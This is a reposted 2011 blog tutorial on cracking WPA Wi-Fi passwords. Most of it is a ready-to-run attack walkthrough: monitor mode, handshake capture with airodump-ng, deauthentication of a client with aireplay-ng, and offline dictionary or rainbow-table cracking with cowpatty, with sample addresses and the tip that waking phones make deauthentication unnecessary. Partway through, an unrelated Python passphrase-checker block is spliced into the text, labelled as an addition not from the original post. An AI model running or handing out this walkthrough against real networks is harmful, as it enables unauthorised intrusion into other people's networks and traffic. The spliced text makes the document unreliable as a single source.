Hacking the WPA Airwaves

I recently picked up the book Hacking Exposed Wireless 2nd Ed.; it looks like an awesome book and I can't wait to start testing some of the fun stuff that Joshua, Johnny, and Vincent have lined up. Today, while following a discussion in the Pauldotcom IRC room, someone pointed me to this guide and I felt it was worth a re-post. Enjoy.

Hacking the WPA Airwaves

by Mark Bennett, infosecisland.com
May 16th 2011

It is interesting how many people believe that their wireless is secure because they are using WPA.

Well, we did a test recently and were able to basically password-guess our way in with a dictionary attack, using either a straight dictionary or a rainbow table.

The cool thing is I bought an ALFA USB antenna and could sit down at the corner coffee place and still see my wireless access point.

Security people: Be sure that your WPA password is an unreadable string, not something found in a dictionary, and not a phrase that you can read, like op3nth3p0dbayd00rs; the tables of today are too intelligent for that.
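The advice above (reject dictionary words and readable leet-speak phrases) can be enforced with a small passphrase policy check. This is an added example, not code from the original post or from any tool it mentions; the mini wordlist, the leet substitution table and the length and dictionary-coverage thresholds are constructed assumptions standing in for a real wordlist and a real policy.

```python
import secrets
import string

# Constructed mini wordlist standing in for a real dictionary or WPA table source;
# a real check would load a large wordlist such as the one the post links to.
WORDLIST = {
    "open", "the", "pod", "bay", "doors", "dynamite", "password",
    "dlink", "wireless", "letmein", "sunshine", "dragon",
}

# Leet substitutions that wordlist mangling rules already undo (assumed subset).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})

def normalize(passphrase: str) -> str:
    """Lower-case and de-leet so the passphrase can be matched against plain words."""
    return passphrase.lower().translate(LEET)

def dictionary_words(passphrase: str, min_len: int = 3) -> list[str]:
    """Greedily carve the normalised passphrase into the longest dictionary words found."""
    text = normalize(passphrase)
    words, i = [], 0
    while i < len(text):
        best = next((text[i:j] for j in range(len(text), i + min_len - 1, -1)
                     if text[i:j] in WORDLIST), None)
        if best:
            words.append(best)
            i += len(best)
        else:
            i += 1
    return words

def check_passphrase(passphrase: str) -> tuple[bool, str]:
    """Return (accepted, reason). Thresholds (16 chars, 80% dictionary coverage) are assumptions."""
    if not passphrase:
        return False, "empty"
    covered = sum(len(w) for w in dictionary_words(passphrase))
    if covered / len(passphrase) >= 0.8:
        return False, "readable phrase built from dictionary words"
    if len(passphrase) < 16:
        return False, "shorter than 16 characters"
    return True, "ok"

def random_passphrase(length: int = 24) -> str:
    """Generate an unreadable passphrase from printable ASCII (WPA allows 8-63 characters)."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))
```

Running check_passphrase on the post's own example op3nth3p0dbayd00rs rejects it because it de-leets to openthepodbaydoors, which the wordlist covers completely.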

In a nutshell, using Linux, this is how it is done:

Part I

airmon-ng start wlan0 (this puts the wireless card in promiscuous mode)

kismet -c wlan0

  • close the console window to see the collection of packets
  • use Alt+K to reach the top pull-down menus; turn on the columns showing the access point type, BSSID, guessed IP address, and channel number

Ctrl-C to exit Kismet

airmon-ng stop wlan0

Part II

airmon-ng start wlan0

airodump-ng -c <channel> --bssid <bssid> -w <file prefix> wlan0

airodump-ng -c 9 --bssid 00:1B:11:EC:3D:D7 -w D-Link wlan0

  * Note: D-Link-01.cap is where the capture of all traffic will go

Now open another window, as we need to force a re-connect from the target (see the Note below):

aireplay-ng -0 <count> -a <bssid> -c <client mac> wlan0

aireplay-ng -0 30 -a 00:1B:11:EC:3D:D7 -c 00:20:00:38:51:06 wlan0

You will see a WPA re-key at the top of the airodump window. Capture some traffic and exit; you will have captured all the traffic in the D-Link-01.cap file.

Part III

Download either rainbow tables or a plain dictionary from Offensive Security: offensive-security.com/wpa-tables

If using hashes (rainbow tables):

cowpatty -r <capture file> -d <hash file> -s <ssid>

cowpatty -r D-Link-01.cap -d dlink.wpa -s dynamite

If using dictionary words:

cowpatty -r <capture file> -f <wordlist> -s <ssid>

cowpatty -r D-Link-01.cap -f passwords.wpa -s dynamite

Note: If you are in an environment that has a lot of cell phones like the iPhone (and they are using their wireless to connect to the network), we found these all go to sleep when their screen is turned off, and then their wireless Ethernet card wakes up when the screen is activated.

So you don't need to send a de-auth; all you have to do is hang around long enough for someone to touch their iPhone or whatever cell phone and have it wake up its wireless and re-auth to the network. In other words, there is the weakest link! — LOL!

Happy Cracking…

As Always, Be Good, Be Safe, and if you are going to hack, hack LEGALLY and RESPONSIBLY—I’m Out!

Cross-posted from Darknet Consulting

Original Page: https://www.infosecisland.com/blogview/13748-Hacking-the-WPA-Airwaves.html